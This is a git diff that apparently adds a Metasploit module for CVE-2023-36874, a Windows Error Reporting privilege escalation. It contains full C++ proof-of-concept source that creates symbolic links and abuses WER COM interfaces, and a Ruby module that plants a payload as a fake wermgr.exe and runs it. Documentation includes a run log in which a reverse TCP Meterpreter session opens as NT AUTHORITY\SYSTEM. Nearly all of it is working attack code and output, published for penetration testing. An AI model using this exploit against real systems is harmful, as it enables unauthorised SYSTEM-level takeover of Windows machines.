diff --git a/LICENSE b/LICENSE
index b962101a8aa2..22ed72e7e413 100644
--- a/LICENSE
+++ b/LICENSE
@@ -80,6 +80,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
Copyright: 2022 Abdelhamid Naceri
License: MIT
+Files: external/source/exploits/CVE-2023-36874/*
+Copyright: 2023 Octoberfest7
+License: MIT
+Purpose: Library and error report file are required for calculating offsets to the correct
+ function calls to implement the exploit. The heavily modified C main is necessary
+ to create and trigger the exploit.
+
Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
Copyright: 2011 Jon Bringhurst
License: GNU GPL 2.0
diff --git a/data/exploits/CVE-2023-36874/CVE-2023-36874.exe b/data/exploits/CVE-2023-36874/CVE-2023-36874.exe
new file mode 100755
index 000000000000..77a906f82442
Binary files /dev/null and b/data/exploits/CVE-2023-36874/CVE-2023-36874.exe differ
diff --git a/data/exploits/CVE-2023-36874/Report.wer b/data/exploits/CVE-2023-36874/Report.wer
new file mode 100644
index 000000000000..e9b7fd6342c7
Binary files /dev/null and b/data/exploits/CVE-2023-36874/Report.wer differ
diff --git a/documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md b/documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md
new file mode 100644
index 000000000000..2fc00cf776d5
--- /dev/null
+++ b/documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md
@@ -0,0 +1,98 @@
+## Vulnerable Application
+This module works only on Windows 10x64 22H2
+
+### Introduction
+
+This module takes advantage of a bug in the way Windows error reporting opens the report
+parser. If you open a report, Windows uses a relative path to locate the rendering program.
+By creating a specific alternate directory structure, we can coerce Windows into opening an
+arbitrary executable as SYSTEM.
+If the current user is a local admin, the system will attempt impersonation and the exploit will
+fail. Because the payload is added to a directory this module creates, in the event of successful
+exploitation, the user will need to delete the payload and the directories containing the payload
+manually.
+
+This module will attempt to delete the payload it uploads and the directory structure.
+
+## Installation Instructions
+1. Install Windows 10x64 22H2
+1. Create a standard user
+
+
+## Verification Steps
+
+1. Create a session on the target system under the context of a non local administrative user.
+1. Begin interacting with the module: `use exploit/windows/local/win_error_cve_2023_36874`.
+1. Set the `PAYLOAD` and configure it correctly.
+1. If an existing handler is configured to receive the elevated session, then the module's
+ handler should be disabled: `set DisablePayloadHandler true`.
+1. Make sure that the `SESSION` value is set to the existing session identifier.
+1. Invoke the module: `run`.
+
+
+## Options
+1. `EXPLOIT_NAME` The filename to use for the exploit binary (%RAND%.exe by default)
+1. `REPORT_DIR` The Error Directory to use (%RAND% by default).
+1. `REPORT_NAME` The Error report name (%RAND% by default).
+1. `SHADOW_DRIVE` Directory to place in the home drive for pivot (%TEMP% by default).
+1. `EXECUTE_DELAY` The number of seconds to delay between file upload and exploit launch. Default is 3.
+
+## Scenarios
+
+### Windows 10.0.19045.2006 x64 (Windows 10x64 22H2)
+
+```
+msf6 exploit(windows/local/win_error_cve_2023_36874) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] OS version: Windows 10+ Build 19045
+[+] The target appears to be vulnerable.
+[*] Shadow Path = C:\NpIWBsCJozK
+[*] Attempting to PrivEsc on DESKTOP-V413087 via session ID: 1
+[*] C:\ProgramData
+[*] Creating C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] Creating directory C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
+[*] Writing Report to C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
+[*] Creating directory C:\NpIWBsCJozK
+[*] C:\NpIWBsCJozK created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\
+[*] C:\NpIWBsCJozK\ProgramData\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
+[*] Writing bad Report to C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
+[*] Creating C:\NpIWBsCJozK\system32
+[*] Creating directory C:\NpIWBsCJozK\system32
+[*] C:\NpIWBsCJozK\system32 created
+[*] Writing payload to C:\NpIWBsCJozK\system32\wermgr.exe
+[*] shadow_path = NpIWBsCJozK
+[*] Exploit uploaded on DESKTOP-V413087 to C:\NpIWBsCJozK\fShpLfYh.exe
+[*] Sending stage (200774 bytes) to 10.5.132.118
+[+] Deleted C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*]
+[+] Deleted C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:62415) at 2023-09-19 15:43:02 -0500
+[-] Failed to delete C:\NpIWBsCJozK\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.
+
+meterpreter > sysinfo
+Computer : DESKTOP-V413087
+OS : Windows 10 (10.0 Build 19045).
+Architecture : x64
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 4
+Meterpreter : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+```
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln
new file mode 100755
index 000000000000..d39f192c0b7c
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.32929.386
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-36874", "CVE-2023-36874\CVE-2023-36874.vcxproj", "{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.ActiveCfg = Debug|x64
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.Build.0 = Debug|x64
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.ActiveCfg = Debug|Win32
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.Build.0 = Debug|Win32
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.ActiveCfg = Release|x64
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.Build.0 = Release|x64
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.ActiveCfg = Release|Win32
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {A022017A-2A80-4E35-A696-EB6884E52E5E}
+ EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj
new file mode 100755
index 000000000000..a0e52bf8cdfd
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj
@@ -0,0 +1,152 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ Win32Proj
+ {4cbf3aca-76e5-4c6a-9483-ca2adc6eaf6b}
+ CVE202336874
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ false
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters
new file mode 100755
index 000000000000..8c78e089aab1
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters
@@ -0,0 +1,27 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ Source Files
+
+
+
+
+ Header Files
+
+
+
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp
new file mode 100755
index 000000000000..2cf89c83f9a4
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp
@@ -0,0 +1,131 @@
+#include "def.h"
+
+int wmain(int argc, wchar_t** argv)
+
+{
+ IWerReport* pIWerReport = NULL;
+ IErcLuaSupport* pIErcLuaSupport = NULL;
+ IWerStoreFactory* pIWerStoreFactory = NULL;
+ IWerStore* pIWerStore = NULL;
+ IWerReportSubmitCallback* pIWerSubmitCallback = NULL;
+ HRESULT result = 0;
+ HMODULE hm = GetModuleHandle(NULL);
+ UNICODE_STRING symlink_name;
+ UNICODE_STRING path;
+ UNICODE_STRING object;
+ OBJECT_ATTRIBUTES objAttrLink, objAttrDir;
+ HANDLE hSymlink, hObjectdir, hSymlinkWindows, hSymlinkProgramdata;
+ HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
+ WCHAR ntdcoDir[128] = { 0 };
+ WCHAR ntdcoDir_1[128] = { 0 };
+ pNtCreateSymbolicLinkObject = (_NtCreateSymbolicLinkObject)GetProcAddress(ntdll, "NtCreateSymbolicLinkObject");
+ pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, "RtlInitUnicodeString");
+ pNtCreateDirectoryObject = (_NtCreateDirectoryObject)GetProcAddress(ntdll, "NtCreateDirectoryObject");
+
+ result = CoInitialize(NULL);
+
+ BSTR data = SysAllocString(argv[1]);
+ //BSTR report = SysAllocString(L"testing");
+ BSTR report = SysAllocString(argv[3]);
+
+ if (FAILED(result))
+ {
+ printf("Error: CoInitialize 0x%x\n", result);
+ return -1;
+ }
+
+ result = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
+
+ if (FAILED(result))
+ {
+ printf("Error: CoInitializeSecurity 0x%x\n", result);
+ return -1;
+ }
+ result = CoCreateInstance(__uuidof(CLSID_IErcLuaSupport), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IErcLuaSupport), (PVOID*)&pIErcLuaSupport);
+ if (FAILED(result))
+ {
+ printf("Error CoCreateInstance: 0x%x\n", result);
+ return -1;
+ }
+
+ result = pIErcLuaSupport->Proc3(&pIWerStoreFactory);
+ if (FAILED(result))
+ {
+ printf("Error pIErcLuaSupport: 0x%x\n", result);
+ return -1;
+ }
+
+ result = pIWerStoreFactory->Proc4(&pIWerStore);
+ if (FAILED(result))
+ {
+ printf("Error pIWerStoreFactory: 0x%x\n", result);
+ return -1;
+ }
+
+ result = pIWerStore->Proc3();
+ if (FAILED(result))
+ {
+ printf("Error pIWerStore(Proc3) : 0x%x\n", result);
+ return -1;
+ }
+
+ result = pIWerStore->Proc6(report, &pIWerReport);
+ if (FAILED(result))
+ {
+ printf("Error pIWerStore(Proc6): 0x%x\n", result);
+ return -1;
+ }
+ int64_t ret = 0;
+
+ ZeroMemory(ntdcoDir, 128);
+ swprintf_s(ntdcoDir, 128, L"\\??\\%ls", argv[1]);
+ pRtlInitUnicodeString(&object, ntdcoDir);
+
+ InitializeObjectAttributes(&objAttrDir, &object, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ pNtCreateDirectoryObject(&hObjectdir, 0xF000F, &objAttrDir);
+
+ pRtlInitUnicodeString(&symlink_name, L"Windows");
+ ZeroMemory(ntdcoDir, 128);
+ swprintf_s(ntdcoDir, 128, L"\\GLOBAL??\\%ls\\%ls", argv[2], argv[1]);
+ pRtlInitUnicodeString(&path, ntdcoDir);
+
+ InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL);
+ pNtCreateSymbolicLinkObject(&hSymlinkWindows, 0xF0001, &objAttrLink, &path);
+
+ ZeroMemory(&objAttrLink, sizeof(objAttrLink));
+ ZeroMemory(&symlink_name, sizeof(symlink_name));
+ ZeroMemory(&path, sizeof(UNICODE_STRING));
+
+ pRtlInitUnicodeString(&symlink_name, L"ProgramData");
+ ZeroMemory(ntdcoDir, 128);
+ swprintf_s(ntdcoDir, 128, L"\\GLOBAL??\\%ls\\Programdata", argv[2]);
+ pRtlInitUnicodeString(&path, ntdcoDir);
+ InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL);
+ pNtCreateSymbolicLinkObject(&hSymlinkProgramdata, 0xF0001, &objAttrLink, &path);
+
+ ZeroMemory(&objAttrLink, sizeof(objAttrLink));
+ ZeroMemory(&symlink_name, sizeof(symlink_name));
+ ZeroMemory(&path, sizeof(UNICODE_STRING));
+
+ ZeroMemory(ntdcoDir, 128);
+ swprintf_s(ntdcoDir, 128, L"\\??\\%ls", argv[2]);
+ pRtlInitUnicodeString(&symlink_name, ntdcoDir);
+
+ ZeroMemory(ntdcoDir_1, 128);
+ swprintf_s(ntdcoDir_1, 128, L"\\??\\%ls", argv[1]);
+ pRtlInitUnicodeString(&path, ntdcoDir_1);
+
+ InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ pNtCreateSymbolicLinkObject(&hSymlink, 0xF0001, &objAttrLink, &path);
+ result = pIWerReport->Proc24(report, 1024, NULL, &data, &ret);
+ if (FAILED(result))
+ {
+ printf("Error pIWerReport: 0x%x\n", result);
+ return -1;
+ }
+ Sleep(2000);
+ CloseHandle(hSymlink);
+ CloseHandle(hObjectdir);
+ CloseHandle(hSymlinkProgramdata);
+ CloseHandle(hSymlinkWindows);
+}
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h
new file mode 100755
index 000000000000..c008c098b62a
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h
@@ -0,0 +1,94 @@
+#include
+#include
+#include
+#include
+
+
+
+struct __declspec(uuid("0e9a7bb5-f699-4d66-8a47-b919f5b6a1db")) CLSID_IErcLuaSupport;
+
+class __declspec(uuid("a7a3dd4c-defc-46a2-832e-5a743be69e8c")) IWerReportSubmitCallback : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t p0);
+ virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ int64_t p1);
+};
+
+
+
+class __declspec(uuid("fe6f6e62-fe82-4f7f-947a-7f37b44594ca")) IWerKeyValueList : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1, /* Stack Offset: 24 */ BSTR* p2);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
+};
+
+
+
+class __declspec(uuid("6764c32a-97a5-44ec-9bc0-77368c7746b2")) IWerStringList : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
+};
+
+
+class __declspec(uuid("d01b8f28-0bd1-4652-a415-8229f5ee506c")) IWerReport : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ IWerKeyValueList** p0);
+ virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ IWerKeyValueList** p0);
+ virtual HRESULT __stdcall Proc8(/* Stack Offset: 8 */ IWerStringList** p0);
+ virtual HRESULT __stdcall Proc9(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc10(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc11(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc12(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc13(/* Stack Offset: 8 */ IWerStringList** p0);
+ virtual HRESULT __stdcall Proc14(/* Stack Offset: 8 */ IWerStringList** p0);
+ virtual HRESULT __stdcall Proc15(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc16(/* Stack Offset: 8 */ struct Struct_1* p0);
+ virtual HRESULT __stdcall Proc17(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc18(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc19(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc20(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ BSTR* p1);
+ virtual HRESULT __stdcall Proc21(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc22(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ int64_t* p1, /* Stack Offset: 24 */ int64_t* p2, /* Stack Offset: 32 */ BSTR* p3, /* Stack Offset: 40 */ BSTR* p4);
+ virtual HRESULT __stdcall Proc23(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1);
+ virtual HRESULT __stdcall Proc24(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ int64_t p1, /* Stack Offset: 24 */ IWerReportSubmitCallback* p2, /* Stack Offset: 32 */ /* unique */BSTR* p3, /* Stack Offset: 40 */ /* unique */int64_t* p4);
+ virtual HRESULT __stdcall Proc25();
+};
+
+class __declspec(uuid("1e3a0e4f-1412-444f-8a94-fc6a09cd4195")) IWerStore : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3();
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ BSTR p0);
+ virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ IWerReport** p1);
+ virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ BSTR* p1);
+};
+
+
+
+class __declspec(uuid("4904c154-426f-4c88-8ec2-4543d18670f7")) IWerStoreFactory : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ IWerStore** p0);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ IWerStore** p0);
+};
+
+
+
+class __declspec(uuid("6620c14b-70ae-4d4e-a4f6-91a7dcc582c2")) IErcLuaSupport : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ IWerStoreFactory** p0);
+};
+
+
+
+
+typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
+typedef NTSYSAPI NTSTATUS(*_NtCreateSymbolicLinkObject)(PHANDLE pHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING DestinationName);
+typedef NTSYSAPI NTSTATUS(*_NtCreateDirectoryObject)(PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
+
+_NtCreateSymbolicLinkObject pNtCreateSymbolicLinkObject;
+_RtlInitUnicodeString pRtlInitUnicodeString;
+_NtCreateDirectoryObject pNtCreateDirectoryObject;
diff --git a/modules/exploits/windows/local/win_error_cve_2023_36874.rb b/modules/exploits/windows/local/win_error_cve_2023_36874.rb
new file mode 100644
index 000000000000..85903053b7b5
--- /dev/null
+++ b/modules/exploits/windows/local/win_error_cve_2023_36874.rb
@@ -0,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Exploit::FileDropper
+ include Msf::Post::Windows::Priv
+ include Msf::Exploit::EXE
+
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',
+ 'Description' => %q{
+ This module takes advantage of a bug in the way Windows error reporting opens the report
+ parser. If you open a report, Windows uses a relative path to locate the rendering program.
+ By creating a specific alternate directory structure, we can coerce Windows into opening an
+ arbitrary executable as SYSTEM.
+ If the current user is a local admin, the system will attempt impersonation and the exploit will
+ fail.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Filip Dragović (Wh04m1001)', # PoC
+ 'Octoberfest7', # PoC
+ 'bwatters-r7' # msf module
+ ],
+ 'Platform' => ['win'],
+ 'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
+ 'Targets' => [
+ [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2023-07-11',
+ 'References' => [
+ ['CVE', '2023-36874'],
+ ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],
+ ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],
+ ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']
+ ],
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [ ARTIFACTS_ON_DISK ]
+ },
+ 'Compat' => {
+ 'Meterpreter' => {
+ 'Commands' => %w[
+ stdapi_fs_delete_file
+ stdapi_sys_config_getenv
+ ]
+ }
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('EXPLOIT_NAME',
+ [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
+ OptString.new('REPORT_DIR',
+ [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
+ OptString.new('SHADOW_DRIVE',
+ [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
+ OptInt.new('EXECUTE_DELAY',
+ [true, 'The number of seconds to delay between file upload and exploit launch', 3])
+ ])
+ end
+
+ def upload_error_report
+ wer_archive_dir = get_env('PROGRAMDATA')
+ vprint_status(wer_archive_dir)
+ wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'
+ report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"
+ report_filename = "#{report_dir}\\Report.wer"
+ vprint_status("Creating #{report_dir}")
+ mkdir(report_dir)
+ wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
+ vprint_status("Writing Report to #{report_filename}")
+ write_file(report_filename, wer_report_data)
+ end
+
+ def build_shadow_archive_dir(shadow_base_dir)
+ wer_archive_dir = shadow_base_dir
+ mkdir(wer_archive_dir)
+ wer_archive_dir << '\\ProgramData\\'
+ mkdir(wer_archive_dir)
+ wer_archive_dir << 'Microsoft\\'
+ mkdir(wer_archive_dir)
+ wer_archive_dir << 'Windows\\'
+ mkdir(wer_archive_dir)
+ wer_archive_dir << 'WER\\'
+ mkdir(wer_archive_dir)
+ wer_archive_dir << 'ReportArchive\\'
+ mkdir(wer_archive_dir)
+ report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"
+ mkdir(report_dir)
+ return report_dir
+ end
+
+ def upload_shadow_report(shadow_archive_dir)
+ report_filename = "#{shadow_archive_dir}\\Report.wer"
+ wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
+ vprint_status("Writing bad Report to #{report_filename}")
+ write_file(report_filename, wer_report_data)
+ end
+
+ def build_shadow_system32(shadow_base_dir)
+ shadow_win32 = "#{shadow_base_dir}\\system32"
+ vprint_status("Creating #{shadow_win32}")
+ mkdir(shadow_win32)
+ return shadow_win32
+ end
+
+ def upload_payload(shadow_win32)
+ payload_bin = generate_payload_exe
+ payload_filename = "#{shadow_win32}\\wermgr.exe"
+ vprint_status("Writing payload to #{payload_filename}")
+ write_file(payload_filename, payload_bin)
+ end
+
+ def upload_execute_exploit(exploit_path, shadow_path, home_dir)
+ vprint_status("shadow_path = #{shadow_path}")
+ exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')
+ write_file(exploit_path, exploit_bin)
+ sleep datastore['EXECUTE_DELAY']
+ vprint_status("Exploit uploaded to #{exploit_path}")
+ cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"
+ output = cmd_exec(cmd, nil, 30)
+ vprint_status(output)
+ end
+
+ def check
+ # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.
+ version = get_version_info
+ vprint_status("OS version: #{version}")
+ return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?
+ fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?
+ shadow_dir = datastore['SHADOW_DRIVE']
+ home_dir = get_env('HOMEDRIVE')
+ shadow_path = "#{home_dir}\\#{shadow_dir}"
+ vprint_status("Shadow Path = #{shadow_path}")
+ upload_error_report
+ shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)
+ upload_shadow_report(shadow_archive_dir)
+ shadow_system32 = build_shadow_system32(shadow_path.dup)
+ upload_payload(shadow_system32)
+ sleep datastore['EXECUTE_DELAY']
+ exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"
+ exploit_path << '.exe' unless exploit_path[-4..] == '.exe'
+ if shadow_dir.length > 64
+ fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')
+ end
+ upload_execute_exploit(exploit_path, shadow_dir, home_dir)
+ print_warning("Manual deletion of #{shadow_path} may be required")
+ end
+end